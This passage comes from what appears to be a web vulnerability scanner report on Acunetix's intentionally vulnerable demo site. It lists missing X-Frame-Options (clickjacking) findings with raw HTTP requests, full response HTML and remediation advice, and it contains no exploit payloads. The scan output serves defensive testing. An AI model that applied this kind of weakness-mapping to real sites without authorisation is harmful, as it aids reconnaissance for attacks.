href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        22. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        23. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
